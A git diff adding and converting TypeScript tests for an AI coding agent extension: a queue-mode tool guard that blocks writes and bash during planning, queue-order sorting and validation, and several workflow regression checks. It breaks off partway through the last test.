+// ─── Scenario 1: Not in queue mode — all tools pass ──
+
+test('queue-guard: allows all tools when queue phase is not active', () => {
+  const r1 = shouldBlockQueueExecution('write', '/src/index.ts', false);
+  assert.strictEqual(r1.block, false, 'write should pass outside queue mode');
+
+  const r2 = shouldBlockQueueExecution('bash', 'npm test', false);
+  assert.strictEqual(r2.block, false, 'bash should pass outside queue mode');
+
+  const r3 = shouldBlockQueueExecution('edit', '/src/index.ts', false);
+  assert.strictEqual(r3.block, false, 'edit should pass outside queue mode');
+});
+
+// ─── Scenario 2: Read-only tools always pass in queue mode ──
+
+test('queue-guard: allows read-only tools during queue mode', () => {
+  for (const tool of ['read', 'grep', 'find', 'ls', 'glob']) {
+    const result = shouldBlockQueueExecution(tool, '/src/index.ts', true);
+    assert.strictEqual(result.block, false, `${tool} should pass in queue mode`);
+  }
+});
+
+// ─── Scenario 3: Discussion/planning tools pass in queue mode ──
+
+test('queue-guard: allows discussion and planning tools during queue mode', () => {
+  const r1 = shouldBlockQueueExecution('ask_user_questions', '', true);
+  assert.strictEqual(r1.block, false, 'ask_user_questions should pass');
+
+  const r2 = shouldBlockQueueExecution('gsd_milestone_generate_id', '', true);
+  assert.strictEqual(r2.block, false, 'gsd_milestone_generate_id should pass');
+
+  const r3 = shouldBlockQueueExecution('gsd_summary_save', '', true);
+  assert.strictEqual(r3.block, false, 'gsd_summary_save should pass');
+});
+
+// ─── Scenario 4: Write to .gsd/ paths passes (planning artifacts) ──
+
+test('queue-guard: allows writes to .gsd/ paths during queue mode', () => {
+  const r1 = shouldBlockQueueExecution('write', '.gsd/milestones/M001/M001-CONTEXT.md', true);
+  assert.strictEqual(r1.block, false, 'write to .gsd/ should pass');
+
+  const r2 = shouldBlockQueueExecution('write', '/project/.gsd/PROJECT.md', true);
+  assert.strictEqual(r2.block, false, 'write to .gsd/PROJECT.md should pass');
+
+  const r3 = shouldBlockQueueExecution('edit', '.gsd/QUEUE.md', true);
+  assert.strictEqual(r3.block, false, 'edit to .gsd/QUEUE.md should pass');
+
+  const r4 = shouldBlockQueueExecution('write', '.gsd/REQUIREMENTS.md', true);
+  assert.strictEqual(r4.block, false, 'write to .gsd/REQUIREMENTS.md should pass');
+
+  const r5 = shouldBlockQueueExecution('write', '.gsd/DECISIONS.md', true);
+  assert.strictEqual(r5.block, false, 'write to .gsd/DECISIONS.md should pass');
+});
+
+// ─── Scenario 5: Write/edit to source code paths blocked ──
+
+test('queue-guard: blocks writes to source code during queue mode', () => {
+  const r1 = shouldBlockQueueExecution('write', 'src/index.ts', true);
+  assert.strictEqual(r1.block, true, 'write to src/ should be blocked');
+  assert.ok(r1.reason, 'should provide a reason');
+  assert.ok(r1.reason!.includes('queue'), 'reason should mention queue');
+
+  const r2 = shouldBlockQueueExecution('write', '/project/src/components/App.tsx', true);
+  assert.strictEqual(r2.block, true, 'write to component file should be blocked');
+
+  const r3 = shouldBlockQueueExecution('edit', 'package.json', true);
+  assert.strictEqual(r3.block, true, 'edit to package.json should be blocked');
+
+  const r4 = shouldBlockQueueExecution('edit', '/project/lib/utils.ts', true);
+  assert.strictEqual(r4.block, true, 'edit to lib/ should be blocked');
+});
+
+// ─── Scenario 6: Bash commands blocked during queue mode ──
+
+test('queue-guard: blocks bash commands during queue mode', () => {
+  const r1 = shouldBlockQueueExecution('bash', 'npm install some-package', true);
+  assert.strictEqual(r1.block, true, 'npm install should be blocked');
+  assert.ok(r1.reason, 'should provide a reason');
+
+  const r2 = shouldBlockQueueExecution('bash', 'node src/index.ts', true);
+  assert.strictEqual(r2.block, true, 'running node should be blocked');
+});
+
+// ─── Scenario 7: Bash read-only commands pass during queue mode ──
+
+test('queue-guard: allows read-only bash commands during queue mode', () => {
+  const r1 = shouldBlockQueueExecution('bash', 'cat src/index.ts', true);
+  assert.strictEqual(r1.block, false, 'cat should pass');
+
+  const r2 = shouldBlockQueueExecution('bash', 'ls -la src/', true);
+  assert.strictEqual(r2.block, false, 'ls should pass');
+
+  const r3 = shouldBlockQueueExecution('bash', 'git log --oneline -10', true);
+  assert.strictEqual(r3.block, false, 'git log should pass');
+
+  const r4 = shouldBlockQueueExecution('bash', 'find . -name "*.ts"', true);
+  assert.strictEqual(r4.block, false, 'find should pass');
+
+  const r5 = shouldBlockQueueExecution('bash', 'grep -rn "TODO" src/', true);
+  assert.strictEqual(r5.block, false, 'grep should pass');
+
+  const r6 = shouldBlockQueueExecution('bash', 'head -20 src/index.ts', true);
+  assert.strictEqual(r6.block, false, 'head should pass');
+
+  const r7 = shouldBlockQueueExecution('bash', 'wc -l src/index.ts', true);
+  assert.strictEqual(r7.block, false, 'wc should pass');
+
+  const r8 = shouldBlockQueueExecution('bash', 'git diff HEAD~1', true);
+  assert.strictEqual(r8.block, false, 'git diff should pass');
+
+  const r9 = shouldBlockQueueExecution('bash', 'gh issue view 42', true);
+  assert.strictEqual(r9.block, false, 'gh issue view should pass');
+});
+
+// ─── Scenario 8: mkdir for .gsd/ milestone directories passes ──
+
+test('queue-guard: allows mkdir for .gsd/ milestone directories', () => {
+  const r1 = shouldBlockQueueExecution('bash', 'mkdir -p .gsd/milestones/M010/slices', true);
+  assert.strictEqual(r1.block, false, 'mkdir -p .gsd/ should pass');
+});
+
+// ─── Scenario 9: Web search and library tools pass ──
+
+test('queue-guard: allows web search and library tools during queue mode', () => {
+  const r1 = shouldBlockQueueExecution('search-the-web', '', true);
+  assert.strictEqual(r1.block, false, 'search-the-web should pass');
+
+  const r2 = shouldBlockQueueExecution('resolve_library', '', true);
+  assert.strictEqual(r2.block, false, 'resolve_library should pass');
+
+  const r3 = shouldBlockQueueExecution('get_library_docs', '', true);
+  assert.strictEqual(r3.block, false, 'get_library_docs should pass');
+
+  const r4 = shouldBlockQueueExecution('fetch_page', '', true);
+  assert.strictEqual(r4.block, false, 'fetch_page should pass');
+});
+
+// ─── Scenario 10: Unknown custom tools are blocked during queue mode ──
+
+test('queue-guard: blocks unknown custom tools during queue mode', () => {
+  const result = shouldBlockQueueExecution('custom_codegen_tool', '', true);
+  assert.strictEqual(result.block, true, 'unknown custom tools should be blocked');
+  assert.ok(result.reason, 'should explain the queue restriction');
+});
diff --git a/src/resources/extensions/gsd/tests/queue-order.test.ts b/src/resources/extensions/gsd/tests/queue-order.test.ts
index 46ad7a82a..890df0fee 100644
--- a/src/resources/extensions/gsd/tests/queue-order.test.ts
+++ b/src/resources/extensions/gsd/tests/queue-order.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync, readFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
@@ -9,10 +11,6 @@ import {
   pruneQueueOrder,
   validateQueueOrder,
 } from '../queue-order.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
-
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -29,176 +27,166 @@ function cleanup(base: string): void {
 // sortByQueueOrder
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== sortByQueueOrder ===');
 
+describe('queue-order', () => {
+test('sortByQueueOrder', () => {
 // Null order → default milestoneIdSort
-{
   const result = sortByQueueOrder(['M003', 'M001', 'M002'], null);
-  assertEq(result, ['M001', 'M002', 'M003'], 'null order falls back to numeric sort');
-}
+  assert.deepStrictEqual(result, ['M001', 'M002', 'M003'], 'null order falls back to numeric sort');
+});
 
 // Custom order → exact sequence
-{
+test('test block at line 39', () => {
   const result = sortByQueueOrder(['M001', 'M002', 'M003'], ['M003', 'M001', 'M002']);
-  assertEq(result, ['M003', 'M001', 'M002'], 'custom order produces exact sequence');
-}
+  assert.deepStrictEqual(result, ['M003', 'M001', 'M002'], 'custom order produces exact sequence');
+});
 
 // Custom order with new IDs → appended at end in numeric order
-{
+test('test block at line 45', () => {
   const result = sortByQueueOrder(['M001', 'M002', 'M003', 'M004'], ['M003', 'M001']);
-  assertEq(result, ['M003', 'M001', 'M002', 'M004'], 'new IDs appended in numeric order');
-}
+  assert.deepStrictEqual(result, ['M003', 'M001', 'M002', 'M004'], 'new IDs appended in numeric order');
+});
 
 // Custom order with deleted IDs → silently skipped
-{
+test('test block at line 51', () => {
   const result = sortByQueueOrder(['M001', 'M003'], ['M003', 'M002', 'M001']);
-  assertEq(result, ['M003', 'M001'], 'deleted IDs in order are skipped');
-}
+  assert.deepStrictEqual(result, ['M003', 'M001'], 'deleted IDs in order are skipped');
+});
 
 // Empty custom order → all IDs in numeric order
-{
+test('test block at line 57', () => {
   const result = sortByQueueOrder(['M002', 'M001'], []);
-  assertEq(result, ['M001', 'M002'], 'empty custom order falls back to numeric sort');
-}
+  assert.deepStrictEqual(result, ['M001', 'M002'], 'empty custom order falls back to numeric sort');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // loadQueueOrder / saveQueueOrder
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== loadQueueOrder / saveQueueOrder ===');
-
+test('loadQueueOrder / saveQueueOrder', () => {
 // Load returns null when file doesn't exist
-{
   const base = createFixtureBase();
-  assertEq(loadQueueOrder(base), null, 'returns null when file missing');
+  assert.deepStrictEqual(loadQueueOrder(base), null, 'returns null when file missing');
   cleanup(base);
-}
+});
 
 // Save then load round-trip
-{
+test('test block at line 76', () => {
   const base = createFixtureBase();
   saveQueueOrder(base, ['M003', 'M001', 'M002']);
   const loaded = loadQueueOrder(base);
-  assertEq(loaded, ['M003', 'M001', 'M002'], 'round-trip preserves order');
+  assert.deepStrictEqual(loaded, ['M003', 'M001', 'M002'], 'round-trip preserves order');
 
   // Verify file contains updatedAt
   const raw = JSON.parse(readFileSync(join(base, '.gsd', 'QUEUE-ORDER.json'), 'utf-8'));
-  assertTrue(typeof raw.updatedAt === 'string' && raw.updatedAt.length > 0, 'file contains updatedAt');
+  assert.ok(typeof raw.updatedAt === 'string' && raw.updatedAt.length > 0, 'file contains updatedAt');
 
   cleanup(base);
-}
+});
 
 // Load returns null on corrupt JSON
-{
+test('test block at line 90', () => {
   const base = createFixtureBase();
   writeFileSync(join(base, '.gsd', 'QUEUE-ORDER.json'), 'not json');
-  assertEq(loadQueueOrder(base), null, 'returns null on corrupt JSON');
+  assert.deepStrictEqual(loadQueueOrder(base), null, 'returns null on corrupt JSON');
   cleanup(base);
-}
+});
 
 // Load returns null when order field is not an array
-{
+test('test block at line 98', () => {
   const base = createFixtureBase();
   writeFileSync(join(base, '.gsd', 'QUEUE-ORDER.json'), '{"order": "invalid"}');
-  assertEq(loadQueueOrder(base), null, 'returns null when order is not array');
+  assert.deepStrictEqual(loadQueueOrder(base), null, 'returns null when order is not array');
   cleanup(base);
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // pruneQueueOrder
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== pruneQueueOrder ===');
-
+test('pruneQueueOrder', () => {
 // Prune removes invalid IDs
-{
   const base = createFixtureBase();
   saveQueueOrder(base, ['M001', 'M002', 'M003']);
   pruneQueueOrder(base, ['M001', 'M003']);
-  assertEq(loadQueueOrder(base), ['M001', 'M003'], 'prune removes invalid IDs');
+  assert.deepStrictEqual(loadQueueOrder(base), ['M001', 'M003'], 'prune removes invalid IDs');
   cleanup(base);
-}
+});
 
 // Prune no-ops when file doesn't exist
-{
+test('test block at line 121', () => {
   const base = createFixtureBase();
   pruneQueueOrder(base, ['M001']); // should not throw
-  assertTrue(!existsSync(join(base, '.gsd', 'QUEUE-ORDER.json')), 'prune does not create file');
+  assert.ok(!existsSync(join(base, '.gsd', 'QUEUE-ORDER.json')), 'prune does not create file');
   cleanup(base);
-}
+});
 
 // Prune no-ops when all IDs are valid
-{
+test('test block at line 129', () => {
   const base = createFixtureBase();
   saveQueueOrder(base, ['M001', 'M002']);
   pruneQueueOrder(base, ['M001', 'M002', 'M003']);
-  assertEq(loadQueueOrder(base), ['M001', 'M002'], 'prune is no-op when all valid');
+  assert.deepStrictEqual(loadQueueOrder(base), ['M001', 'M002'], 'prune is no-op when all valid');
   cleanup(base);
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // validateQueueOrder
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== validateQueueOrder ===');
-
+test('validateQueueOrder', () => {
 // Valid order with no dependencies
-{
   const depsMap = new Map<string, string[]>();
   const result = validateQueueOrder(['M001', 'M002'], depsMap, new Set());
-  assertTrue(result.valid, 'valid when no dependencies');
-  assertEq(result.violations.length, 0, 'no violations');
-  assertEq(result.redundant.length, 0, 'no redundancies');
-}
+  assert.ok(result.valid, 'valid when no dependencies');
+  assert.deepStrictEqual(result.violations.length, 0, 'no violations');
+  assert.deepStrictEqual(result.redundant.length, 0, 'no redundancies');
+});
 
 // Dependency violation: M002 before M001, but M002 depends on M001
-{
+test('test block at line 153', () => {
   const depsMap = new Map<string, string[]>([['M002', ['M001']]]);
   const result = validateQueueOrder(['M002', 'M001'], depsMap, new Set());
-  assertTrue(!result.valid, 'invalid when dep violated');
-  assertEq(result.violations.length, 1, 'one violation');
-  assertEq(result.violations[0].type, 'would_block', 'violation type is would_block');
-  assertEq(result.violations[0].milestone, 'M002', 'violation milestone is M002');
-  assertEq(result.violations[0].dependsOn, 'M001', 'violation dep is M001');
-}
+  assert.ok(!result.valid, 'invalid when dep violated');
+  assert.deepStrictEqual(result.violations.length, 1, 'one violation');
+  assert.deepStrictEqual(result.violations[0].type, 'would_block', 'violation type is would_block');
+  assert.deepStrictEqual(result.violations[0].milestone, 'M002', 'violation milestone is M002');
+  assert.deepStrictEqual(result.violations[0].dependsOn, 'M001', 'violation dep is M001');
+});
 
 // Redundant dependency: M002 depends on M001, M001 comes first in order
-{
+test('test block at line 164', () => {
   const depsMap = new Map<string, string[]>([['M002', ['M001']]]);
   const result = validateQueueOrder(['M001', 'M002'], depsMap, new Set());
-  assertTrue(result.valid, 'valid when dep satisfied by position');
-  assertEq(result.redundant.length, 1, 'one redundancy');
-  assertEq(result.redundant[0].milestone, 'M002', 'redundant milestone is M002');
-}
+  assert.ok(result.valid, 'valid when dep satisfied by position');
+  assert.deepStrictEqual(result.redundant.length, 1, 'one redundancy');
+  assert.deepStrictEqual(result.redundant[0].milestone, 'M002', 'redundant milestone is M002');
+});
 
 // Completed dep is always satisfied
-{
+test('test block at line 173', () => {
   const depsMap = new Map<string, string[]>([['M002', ['M001']]]);
   const result = validateQueueOrder(['M002'], depsMap, new Set(['M001']));
-  assertTrue(result.valid, 'valid when dep is already completed');
-  assertEq(result.violations.length, 0, 'no violations for completed dep');
-}
+  assert.ok(result.valid, 'valid when dep is already completed');
+  assert.deepStrictEqual(result.violations.length, 0, 'no violations for completed dep');
+});
 
 // Missing dependency
-{
+test('test block at line 181', () => {
   const depsMap = new Map<string, string[]>([['M002', ['M099']]]);
   const result = validateQueueOrder(['M001', 'M002'], depsMap, new Set());
-  assertTrue(!result.valid, 'invalid when dep does not exist');
-  assertEq(result.violations[0].type, 'missing_dep', 'violation type is missing_dep');
-}
+  assert.ok(!result.valid, 'invalid when dep does not exist');
+  assert.deepStrictEqual(result.violations[0].type, 'missing_dep', 'violation type is missing_dep');
+});
 
 // Circular dependency
-{
+test('test block at line 189', () => {
   const depsMap = new Map<string, string[]>([
     ['M001', ['M002']],
     ['M002', ['M001']],
   ]);
   const result = validateQueueOrder(['M001', 'M002'], depsMap, new Set());
-  assertTrue(!result.valid, 'invalid on circular dependency');
+  assert.ok(!result.valid, 'invalid on circular dependency');
   const circularViolation = result.violations.find(v => v.type === 'circular');
-  assertTrue(!!circularViolation, 'circular violation detected');
-}
+  assert.ok(!!circularViolation, 'circular violation detected');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
-
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/queued-discuss-fast-path.test.ts b/src/resources/extensions/gsd/tests/queued-discuss-fast-path.test.ts
new file mode 100644
index 000000000..75b249485
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/queued-discuss-fast-path.test.ts
@@ -0,0 +1,107 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+function guidedFlowSrc(): string {
+  return readFileSync(join(__dirname, "..", "guided-flow.ts"), "utf-8");
+}
+
+function promptSrc(): string {
+  return readFileSync(join(__dirname, "..", "prompts", "guided-discuss-milestone.md"), "utf-8");
+}
+
+describe("queued-discuss-fast-path", () => {
+  test("1. guided-discuss-milestone.md contains {{fastPathInstruction}}", () => {
+    const prompt = promptSrc();
+    assert.ok(
+      prompt.includes("{{fastPathInstruction}}"),
+      "guided-discuss-milestone.md must contain {{fastPathInstruction}} template variable",
+    );
+  });
+
+  test("2. dispatchDiscussForMilestone computes fastPathInstruction and passes it to loadPrompt", () => {
+    const source = guidedFlowSrc();
+    const fnStart = source.indexOf("async function dispatchDiscussForMilestone(");
+    assert.ok(fnStart > 0, "dispatchDiscussForMilestone must exist");
+    const fnEnd = source.indexOf("\nasync function ", fnStart + 1);
+    const fnBody = fnEnd > 0 ? source.slice(fnStart, fnEnd) : source.slice(fnStart, fnStart + 2000);
+    assert.ok(
+      fnBody.includes("fastPathInstruction"),
+      "dispatchDiscussForMilestone must compute fastPathInstruction",
+    );
+    assert.ok(
+      fnBody.includes("loadPrompt("),
+      "dispatchDiscussForMilestone must call loadPrompt",
+    );
+    const loadPromptIdx = fnBody.indexOf("loadPrompt(");
+    const fastPathIdx = fnBody.indexOf("fastPathInstruction", loadPromptIdx);
+    assert.ok(
+      fastPathIdx > loadPromptIdx,
+      "fastPathInstruction must be passed to loadPrompt in dispatchDiscussForMilestone",
+    );
+  });
+
+  test("3. fast path instruction mentions scouting and conflict checking", () => {
+    const source = guidedFlowSrc();
+    assert.ok(
+      source.includes("scouting pass"),
+      "fast path instruction must mention scouting pass",
+    );
+    assert.ok(
+      source.includes("conflicts with existing work"),
+      "fast path instruction must mention conflict checking",
+    );
+  });
+
+  test("4. showDiscussQueuedMilestone shows a mode picker when no draft", () => {
+    const source = guidedFlowSrc();
+    const fnStart = source.indexOf("async function showDiscussQueuedMilestone(");
+    assert.ok(fnStart > 0, "showDiscussQueuedMilestone must exist");
+    const fnEnd = source.indexOf("\nasync function ", fnStart + 1);
+    const fnBody = fnEnd > 0 ? source.slice(fnStart, fnEnd) : source.slice(fnStart, fnStart + 3000);
+    assert.ok(
+      fnBody.includes("hasDraft"),
+      "showDiscussQueuedMilestone must check hasDraft",
+    );
+    assert.ok(
+      fnBody.includes('"full"') || fnBody.includes("\"full\""),
+      "showDiscussQueuedMilestone must offer a 'full' discussion mode",
+    );
+    assert.ok(
+      fnBody.includes('"fast"') || fnBody.includes("\"fast\""),
+      "showDiscussQueuedMilestone must offer a 'fast' path mode",
+    );
+  });
+
+  test("5. showDiscussQueuedMilestone fast-paths automatically when draft exists", () => {
+    const source = guidedFlowSrc();
+    const fnStart = source.indexOf("async function showDiscussQueuedMilestone(");
+    assert.ok(fnStart > 0, "showDiscussQueuedMilestone must exist");
+    const fnEnd = source.indexOf("\nasync function ", fnStart + 1);
+    const fnBody = fnEnd > 0 ? source.slice(fnStart, fnEnd) : source.slice(fnStart, fnStart + 3000);
+    assert.ok(
+      fnBody.includes("let fastPath = hasDraft"),
+      "showDiscussQueuedMilestone must set fastPath = hasDraft so draft presence auto-enables fast path",
+    );
+    assert.ok(
+      fnBody.includes("if (!hasDraft)"),
+      "showDiscussQueuedMilestone must skip the mode picker when hasDraft is true",
+    );
+  });
+
+  test("6. dispatchDiscussForMilestone accepts opts with fastPath parameter", () => {
+    const source = guidedFlowSrc();
+    const fnStart = source.indexOf("async function dispatchDiscussForMilestone(");
+    assert.ok(fnStart > 0, "dispatchDiscussForMilestone must exist");
+    const signatureEnd = source.indexOf("): Promise<void>", fnStart);
+    const signature = source.slice(fnStart, signatureEnd + 16);
+    assert.ok(
+      signature.includes("opts") && signature.includes("fastPath"),
+      "dispatchDiscussForMilestone must accept opts: { fastPath?: boolean } parameter",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/quick-auto-guard.test.ts b/src/resources/extensions/gsd/tests/quick-auto-guard.test.ts
new file mode 100644
index 000000000..f48f4e925
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/quick-auto-guard.test.ts
@@ -0,0 +1,100 @@
+/**
+ * Tests that /gsd quick is blocked when auto-mode is active.
+ *
+ * Relates to #2417: /gsd quick freezes terminal when auto-mode is active.
+ * The fix adds an isAutoActive() guard in handleWorkflowCommand before
+ * delegating to handleQuick.
+ */
+
+import { describe, it, mock, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── Structural test: verify the guard exists in source ──────────────────────
+
+describe("/gsd quick auto-mode guard (#2417)", () => {
+  it("handleWorkflowCommand checks isAutoActive() before calling handleQuick", () => {
+    // Read the source file and verify the guard is structurally present
+    const src = readFileSync(
+      join(
+        import.meta.dirname,
+        "..",
+        "commands",
+        "handlers",
+        "workflow.ts",
+      ),
+      "utf-8",
+    );
+
+    // Find the quick command block
+    const quickBlockMatch = src.match(
+      /if\s*\(\s*trimmed\s*===\s*"quick"\s*\|\|\s*trimmed\.startsWith\("quick "\)\s*\)\s*\{([\s\S]*?)\n  \}/,
+    );
+    assert.ok(quickBlockMatch, "quick command block exists in handleWorkflowCommand");
+
+    const quickBlock = quickBlockMatch[1];
+
+    // Verify isAutoActive guard comes BEFORE handleQuick call
+    const guardIndex = quickBlock.indexOf("isAutoActive()");
+    const handleQuickIndex = quickBlock.indexOf("handleQuick(");
+
+    assert.ok(guardIndex !== -1, "isAutoActive() guard exists in quick command block");
+    assert.ok(handleQuickIndex !== -1, "handleQuick() call exists in quick command block");
+    assert.ok(
+      guardIndex < handleQuickIndex,
+      "isAutoActive() guard appears before handleQuick() call",
+    );
+  });
+
+  it("guard shows error message mentioning /gsd stop", () => {
+    const src = readFileSync(
+      join(
+        import.meta.dirname,
+        "..",
+        "commands",
+        "handlers",
+        "workflow.ts",
+      ),
+      "utf-8",
+    );
+
+    // The error message should tell the user to stop auto-mode first
+    assert.ok(
+      src.includes("/gsd quick cannot run while auto-mode is active"),
+      "error message explains that quick cannot run during auto-mode",
+    );
+    assert.ok(
+      src.includes("/gsd stop"),
+      "error message mentions /gsd stop as the resolution",
+    );
+  });
+
+  it("guard returns true (handled) to prevent falling through", () => {
+    const src = readFileSync(
+      join(
+        import.meta.dirname,
+        "..",
+        "commands",
+        "handlers",
+        "workflow.ts",
+      ),
+      "utf-8",
+    );
+
+    // After the isAutoActive() check and notify, there should be a `return true`
+    // before the handleQuick call
+    const quickBlockMatch = src.match(
+      /if\s*\(\s*trimmed\s*===\s*"quick"\s*\|\|\s*trimmed\.startsWith\("quick "\)\s*\)\s*\{([\s\S]*?)\n  \}/,
+    );
+    assert.ok(quickBlockMatch);
+    const quickBlock = quickBlockMatch[1];
+
+    // The guard block should have its own return true before handleQuick
+    const guardBlock = quickBlock.slice(0, quickBlock.indexOf("handleQuick("));
+    assert.ok(
+      guardBlock.includes("return true"),
+      "guard block returns true before handleQuick is reached",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/quick-turn-end-cleanup.test.ts b/src/resources/extensions/gsd/tests/quick-turn-end-cleanup.test.ts
new file mode 100644
index 000000000..5051a8567
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/quick-turn-end-cleanup.test.ts
@@ -0,0 +1,90 @@
+/**
+ * Tests that cleanupQuickBranch is called on turn_end to squash-merge the
+ * quick branch back to the original branch after the agent completes.
+ *
+ * Relates to #2668: /gsd quick does not squash-merge branch back after agent
+ * completes task. cleanupQuickBranch() exists but is never invoked.
+ *
+ * The fix registers a turn_end hook in register-hooks.ts that calls
+ * cleanupQuickBranch() after each turn, which is a no-op when no quick-task
+ * state is pending.
+ */
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── Structural test: verify turn_end hook exists in register-hooks.ts ──────
+
+describe("quick task turn_end cleanup (#2668)", () => {
+  const hooksSource = readFileSync(
+    join(import.meta.dirname, "..", "bootstrap", "register-hooks.ts"),
+    "utf-8",
+  );
+
+  it("register-hooks.ts imports cleanupQuickBranch from quick.ts", () => {
+    assert.ok(
+      hooksSource.includes("cleanupQuickBranch"),
+      "register-hooks.ts must reference cleanupQuickBranch",
+    );
+
+    // Verify it's imported (not just mentioned in a comment)
+    const importMatch = hooksSource.match(
+      /import\s*\{[^}]*cleanupQuickBranch[^}]*\}\s*from\s*["'][^"']*quick/,
+    );
+    assert.ok(
+      importMatch,
+      "cleanupQuickBranch must be imported from quick module",
+    );
+  });
+
+  it("registers a turn_end handler that calls cleanupQuickBranch", () => {
+    // Find the turn_end registration
+    const turnEndMatch = hooksSource.match(
+      /pi\.on\(\s*["']turn_end["']/,
+    );
+    assert.ok(
+      turnEndMatch,
+      "register-hooks.ts must register a turn_end handler",
+    );
+
+    // Extract the turn_end handler body — find everything from the pi.on("turn_end"
+    // to the matching closing });
+    const turnEndIdx = hooksSource.indexOf(turnEndMatch[0]);
+    assert.ok(turnEndIdx !== -1);
+
+    // Get the rest of the source from that point
+    const rest = hooksSource.slice(turnEndIdx);
+
+    // The handler must call cleanupQuickBranch
+    // Look for cleanupQuickBranch within the first handler body (up to first `});`)
+    const handlerEnd = rest.indexOf("});");
+    assert.ok(handlerEnd !== -1, "turn_end handler has a closing });");
+
+    const handlerBody = rest.slice(0, handlerEnd);
+    assert.ok(
+      handlerBody.includes("cleanupQuickBranch"),
+      "turn_end handler must call cleanupQuickBranch",
+    );
+  });
+
+  it("turn_end handler calls cleanupQuickBranch without arguments (uses cwd default)", () => {
+    // cleanupQuickBranch(basePath = process.cwd()) — calling without args is correct
+    // because the handler runs in the same process where handleQuick set up cwd
+    const turnEndIdx = hooksSource.indexOf('pi.on("turn_end"') !== -1
+      ? hooksSource.indexOf('pi.on("turn_end"')
+      : hooksSource.indexOf("pi.on('turn_end'");
+    assert.ok(turnEndIdx !== -1);
+
+    const rest = hooksSource.slice(turnEndIdx);
+    const handlerEnd = rest.indexOf("});");
+    const handlerBody = rest.slice(0, handlerEnd);
+
+    // Should call cleanupQuickBranch() — either bare or with no-arg form
+    assert.ok(
+      handlerBody.includes("cleanupQuickBranch("),
+      "turn_end handler invokes cleanupQuickBranch()",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/rate-limit-model-fallback.test.ts b/src/resources/extensions/gsd/tests/rate-limit-model-fallback.test.ts
new file mode 100644
index 000000000..a375225ef
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/rate-limit-model-fallback.test.ts
@@ -0,0 +1,90 @@
+/**
+ * rate-limit-model-fallback.test.ts — Regression test for #2770.
+ *
+ * Rate-limit errors enter the model fallback path before falling through
+ * to pause. This verifies the structural contract in agent-end-recovery.ts.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const RECOVERY_PATH = join(__dirname, "..", "bootstrap", "agent-end-recovery.ts");
+
+function getRecoverySource(): string {
+  return readFileSync(RECOVERY_PATH, "utf-8");
+}
+
+// ── Rate-limit errors attempt model fallback (#2770) ─────────────────────────
+
+test("rate-limit errors enter the model fallback branch alongside other transient errors", () => {
+  const src = getRecoverySource();
+
+  // The condition that gates model fallback must include rate-limit.
+  // Match the if-condition that contains both "rate-limit" and fallback-related kinds.
+  const fallbackConditionRe = /if\s*\([^)]*cls\.kind\s*===\s*"rate-limit"[^)]*cls\.kind\s*===\s*"network"/;
+  const fallbackConditionReAlt = /if\s*\([^)]*cls\.kind\s*===\s*"network"[^)]*cls\.kind\s*===\s*"rate-limit"/;
+
+  assert.ok(
+    fallbackConditionRe.test(src) || fallbackConditionReAlt.test(src),
+    'rate-limit must appear in the same if-condition as network/server for model fallback (#2770)',
+  );
+});
+
+test("rate-limit errors are NOT short-circuited to pause before model fallback", () => {
+  const src = getRecoverySource();
+
+  // The old code had a dedicated rate-limit early-return block before the fallback block.
+  // Verify it no longer exists.
+  const earlyRateLimitPause = /if\s*\(\s*cls\.kind\s*===\s*"rate-limit"\s*\)\s*\{[^}]*pauseTransientWithBackoff/;
+  assert.ok(
+    !earlyRateLimitPause.test(src),
+    'rate-limit must NOT have a dedicated early pause before the model fallback path (#2770)',
+  );
+});
+
+test("rate-limit errors fall through to pause if no fallback model is available", () => {
+  const src = getRecoverySource();
+
+  // After the fallback block, the transient fallback pause must still fire for rate-limit.
+  // The isTransient check covers rate-limit (verified by error-classifier tests).
+  // Verify pauseTransientWithBackoff is called with isRateLimit derived from cls.kind.
+  assert.ok(
+    src.includes('cls.kind === "rate-limit"'),
+    'agent-end-recovery.ts must reference cls.kind === "rate-limit" for fallback and pause paths (#2770)',
+  );
+
+  // The transient fallback pause must pass the isRateLimit flag correctly.
+  const pauseCallRe = /pauseTransientWithBackoff\([^)]*cls\.kind\s*===\s*"rate-limit"/;
+  assert.ok(
+    pauseCallRe.test(src),
+    'pauseTransientWithBackoff must receive isRateLimit based on cls.kind === "rate-limit" (#2770)',
+  );
+});
+
+test("other transient errors (server, connection, stream) still attempt model fallback", () => {
+  const src = getRecoverySource();
+
+  // All transient kinds must appear in the fallback condition.
+  for (const kind of ["server", "connection", "stream"]) {
+    assert.ok(
+      src.includes(`cls.kind === "${kind}"`),
